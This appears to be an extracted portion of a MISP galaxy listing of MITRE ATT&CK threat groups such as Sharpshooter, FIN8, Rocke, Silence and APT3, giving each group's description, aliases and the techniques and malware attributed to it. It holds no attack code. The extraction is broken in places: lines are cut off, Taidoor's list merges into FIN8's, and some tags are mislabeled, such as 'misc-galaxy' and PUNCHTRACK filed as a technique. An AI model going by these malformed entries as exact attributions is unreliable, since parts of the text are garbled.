- uses: misp-galaxy:mitre-attack-pattern="Dead DropResolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="BLACKCOFFEE - S0069" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="China Chopper - S0020" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="PowerSploit - S0194" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="njRAT - S0385" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="gh0st RAT - S0032" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="pwdump - S0006" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="netstat - S0104" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="ROCKBOOT - S0112" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="Derusbi - S0021" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="ASPXSpy - S0073" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="PlugX - S0013" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="Ping - S0097" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="ZxShell - S0412" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="FTP - S0095" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="certutil - S0160" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="BITSAdmin - S0190" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-
Sharpshooter - G0104

Operation [Sharpshooter](https://attack.mitre.org/groups/G0104) is the name of a cyber espionage campaign discovered in October 2018 targeting nuclear, defense, energy, and financial companies.
Though overlaps between this adversary and [Lazarus Group](https://attack.mitre.org/groups/G0032) have been noted, definitive links have not been established. (Citation: McAfee Sharpshooter December 2018)

The tag is: **misp-galaxy:mitre-intrusion-set="Sharpshooter - G0104"**

Sharpshooter - G0104 is also known as:

- Sharpshooter

Sharpshooter - G0104 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/groups/G0104">https://attack.mitre.org/groups/G0104</a></td>
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</table>

**Strider - G0041**

[Strider](https://attack.mitre.org/groups/G0041) is a threat group that has been active since at least 2011 and has targeted victims in Russia, China, Sweden, Belgium, Iran, and Rwanda. (Citation: Symantec Strider Blog)(Citation: Kaspersky ProjectSauron Blog)

The tag is: **misp-galaxy:mitre-intrusion-set="Strider - G0041"**

Strider - G0041 is also known as:
• Strider
• ProjectSauron

Strider - G0041 has relationships with:

• similar: misp-galaxy:threat-actor="ProjectSauron" with estimative-language:likelihood-probability="likely"
• uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="Remsec - S0125" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Password Filter DLL - T1556.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Hidden File System - T1564.005" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/groups/G0041">https://attack.mitre.org/groups/G0041</a></td>
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<td><a href="http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets">http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets</a></td>
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<td><a href="https://securelist.com/faq-the-projectsauron-apt/75533/">https://securelist.com/faq-the-projectsauron-apt/75533/</a></td>
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<td><a href="https://securelist.com/files/2016/07/The-ProjectSauron-APT_research_KL.pdf">https://securelist.com/files/2016/07/The-ProjectSauron-APT_research_KL.pdf</a></td>
</tr>
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</table>

DarkVishnya - G0105

[DarkVishnya](https://attack.mitre.org/groups/G0105) is a financially motivated threat actor targeting financial institutions in Eastern Europe. In 2017-2018 the group attacked at least 8 banks in this region.(Citation: Securelist DarkVishnya Dec 2018)

The tag is: misp-galaxy:mitre-intrusion-set="DarkVishnya - G0105"

DarkVishnya - G0105 is also known as:

• DarkVishnya

DarkVishnya - G0105 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Hardware Additions - T1200" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="Winexe - S0191" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"

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**Table 4330. Table References**

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<td><a href="https://attack.mitre.org/groups/G0105">https://attack.mitre.org/groups/G0105</a></td>
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<tr>
<td><a href="https://securelist.com/darkvishnya/89169/">https://securelist.com/darkvishnya/89169/</a></td>
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<td><a href="https://attack.mitre.org/groups/G0015">https://attack.mitre.org/groups/G0015</a></td>
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**Taidoor - G0015**

[Taidoor](https://attack.mitre.org/groups/G0015) is a threat group that has operated since at least 2009 and has primarily targeted the Taiwanese government. (Citation: TrendMicro Taidoor)

The tag is: `misp-galaxy:mitre-intrusion-set="Taidoor - G0015"`

Taidoor - G0015 is also known as:

• Taidoor

Taidoor - G0015 has relationships with:

**FIN8 - G0061**

[FIN8](https://attack.mitre.org/groups/G0061) is a financially motivated threat group known to launch tailored spearphishing campaigns targeting the retail, restaurant, and hospitality industries. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Fin8 May 2016)

The tag is: `misp-galaxy:mitre-intrusion-set="FIN8 - G0061"

FIN8 - G0061 is also known as:

- FIN8

FIN8 - G0061 has relationships with:

- similar: `misp-galaxy:threat-actor="FIN8" with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-tool="dsquery - S0105" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PUNCHTRACK - S0197" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote Data Staging - T1074.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="PUNCHBUGGY - S0196" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/groups/G0061">https://attack.mitre.org/groups/G0061</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html">https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html</a></td>
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</tbody>
</table>
Rocke - G0106

[Rocke](https://attack.mitre.org/groups/G0106) is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name [Rocke](https://attack.mitre.org/groups/G0106) comes from the email address "rocke@live.cn" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between [Rocke](https://attack.mitre.org/groups/G0106) and the Iron Cybercrime Group, though this attribution has not been confirmed.(Citation: Talos Rocke August 2018)

The tag is: `misp-galaxy:mitre-intrusion-set="Rocke - G0106"`

Rocke - G0106 is also known as:

- Rocke

Rocke - G0106 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Boot or Logon Initialization Scripts - T1037"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001"` with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Clear Linux or Mac System Logs - T1070.002" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1027.004" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Dynamic Linker Hijacking - T1574.006" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/groups/G0106">https://attack.mitre.org/groups/G0106</a></td>
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**DragonOK - G0017**

[DragonOK](https://attack.mitre.org/groups/G0017) is a threat group that has targeted Japanese organizations with phishing emails. Due to overlapping TTPs, including similar custom tools, [DragonOK](https://attack.mitre.org/groups/G0017) is thought to have a direct or indirect relationship with the threat group [Moafee](https://attack.mitre.org/groups/G0002). (Citation: Operation Quantum Entanglement) It is known to use a variety of malware, including Sysget/HelloBridge, PlugX, PoisonIvy, FormerFirstRat, NFlog, and NewCT. (Citation: New DragonOK)

The tag is: `misp-galaxy:mitre-intrusion-set="DragonOK - G0017"`

DragonOK - G0017 is also known as:

- DragonOK

DragonOK - G0017 has relationships with:

- similar: misp-galaxy:threat-actor="DragonOK" with estimative-language:likelihood-probability="likely"


- uses: misp-galaxy:mitre-malware="PlugX - S0013" with estimative-language:likelihood-probability="almost-certain"

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</table>
Orangeworm - G0071

[Orangeworm](https://attack.mitre.org/groups/G0071) is a group that has targeted organizations in the healthcare sector in the United States, Europe, and Asia since at least 2015, likely for the purpose of corporate espionage. (Citation: Symantec Orangeworm April 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Orangeworm - G0071"

Orangeworm - G0071 is also known as:

- Orangeworm

Orangeworm - G0071 has relationships with:

- uses: misp-galaxy:mitre-tool="Systeminfo" - S0096 with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="ipconfig" - S0100 with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="Net" - S0039 with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="route" - S0103 with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="cmd" - S0106 with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="cmd" - S0106 with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="Kwampirs - S0236" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="netstat" - S0104 with estimative-language:likelihood-probability="almost-certain"

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</table>

Whitefly - G0107

[Whitefly](https://attack.mitre.org/groups/G0107) is a cyber espionage group that has been
operating since at least 2017. The group has targeted organizations based mostly in Singapore across a wide variety of sectors, and is primarily interested in stealing large amounts of sensitive information. The group has been linked to an attack against Singapore’s largest public health organization, SingHealth.(Citation: Symantec Whitefly March 2019)

The tag is: `misp-galaxy:mitre-intrusion-set="Whitefly - G0107"

Whitefly - G0107 is also known as:

- Whitefly

Whitefly - G0107 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001"` with estimative-language:likelihood-probability="almost-certain"

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**Naikon - G0019**

[Naikon](https://attack.mitre.org/groups/G0019) is a threat group that has focused on targets around the South China Sea.(Citation: Baumgartner Naikon 2015) The group has been attributed to the Chinese People’s Liberation Army’s (PLA) Chengdu Military Region Second Technical Reconnaissance Bureau(Military Unit Cover Designator 78020).(Citation: CameraShy) While
Naikon (https://attack.mitre.org/groups/G0019) shares some characteristics with APT30 (https://attack.mitre.org/groups/G0013), the two groups do not appear to be exact matches. (Citation: Baumgartner Golovkin Naikon 2015)

The tag is: misc-galaxy:mitre-intrusion-set="Naikon - G0019"

Naikon - G0019 is also known as:

- Naikon

Naikon - G0019 has relationships with:

- similar: misc-galaxy:threat-actor="Naikon" with estimative-language:likelihood-probability="likely"
- similar: misc-galaxy:threat-actor="Lotus Panda" with estimative-language:likelihood-probability="likely"
- similar: misc-galaxy:threat-actor="APT 30" with estimative-language:likelihood-probability="likely"
- uses: misc-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
- uses: misc-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
- uses: misc-galaxy:mitre-tool="Systeminfo - S0096" with estimative-language:likelihood-probability="almost-certain"
- uses: misc-galaxy:mitre-malware="Sys10 - S0060" with estimative-language:likelihood-probability="almost-certain"
- uses: misc-galaxy:mitre-malware="WinMM - S0059" with estimative-language:likelihood-probability="almost-certain"
- uses: misc-galaxy:mitre-malware="RARSTONE - S0055" with estimative-language:likelihood-probability="almost-certain"
- uses: misc-galaxy:mitre-malware="SslMM - S0058" with estimative-language:likelihood-probability="almost-certain"
- uses: misc-galaxy:mitre-malware="HDoor - S0061" with estimative-language:likelihood-probability="almost-certain"
- uses: misc-galaxy:mitre-tool="FTP - S0095" with estimative-language:likelihood-probability="almost-certain"
- uses: misc-galaxy:mitre-tool="Ping - S0097" with estimative-language:likelihood-probability="almost-certain"
- uses: misc-galaxy:mitre-tool="netsh - S0108" with estimative-language:likelihood-probability="almost-certain"
- uses: misc-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with

2184
estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-malware="Aria-body - S0456" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="http://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf">http://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf</a></td>
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<tr>
<td><a href="https://securelist.com/the-naikon-apt/69953/">https://securelist.com/the-naikon-apt/69953/</a></td>
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**Silence - G0091**

[Silence](https://attack.mitre.org/groups/G0091) is a financially motivated threat actor targeting financial institutions in different countries. The group was first seen in June 2016. Their main targets reside in Russia, Ukraine, Belarus, Azerbaijan, Poland and Kazakhstan. They compromised various banking systems, including the Russian Central Bank's Automated Workstation Client, ATMs, and card processing.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)

The tag is: *misp-galaxy:mitre-intrusion-set="Silence - G0091"*

Silence - G0091 is also known as:

- Silence
- WHISPER SPIDER

Silence - G0091 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="Winexe - S0191" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="SDelete - S0195" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="Empire - S0363" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
- misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002" with estimative-language:likelihood-probability="almost-certain"
- misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://securelist.com/the-silence/83009/">https://securelist.com/the-silence/83009/</a></td>
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**APT3 - G0022**

[APT3](https://attack.mitre.org/groups/G0022) is a China-based threat group that researchers have attributed to China’s Ministry of State Security. (Citation: FireEye Clandestine Wolf) (Citation: Recorded Future APT3 May 2017) This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap. (Citation: FireEye Clandestine Wolf) (Citation: FireEye Operation Double Tap) As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong. (Citation: Symantec Buckeye)

MITRE has also developed an APT3 Adversary Emulation Plan. (Citation: APT3 Adversary Emulation Plan)

The tag is: misp-galaxy:mitre-intrusion-set="APT3 - G0022"

APT3 - G0022 is also known as:

- APT3
APT3 - G0022 has relationships with:

- similar: misp-galaxy:threat-actor="UPS" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-malware="RemoteCMD - S0166" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="schtasks - S0111" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="OSInfo - S0165" with estimative-language:likelihood-probability="almost-certain"
- Uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
- Uses: misp-galaxy:mitre-malware="SHOTPUT - S0063" with estimative-language:likelihood-probability="almost-certain"
- Uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- Uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- Uses: misp-galaxy:mitre-tool="LaZagne - S0349" with estimative-language:likelihood-probability="almost-certain"
- Uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
- Uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
- Uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/groups/G0022">https://attack.mitre.org/groups/G0022</a></td>
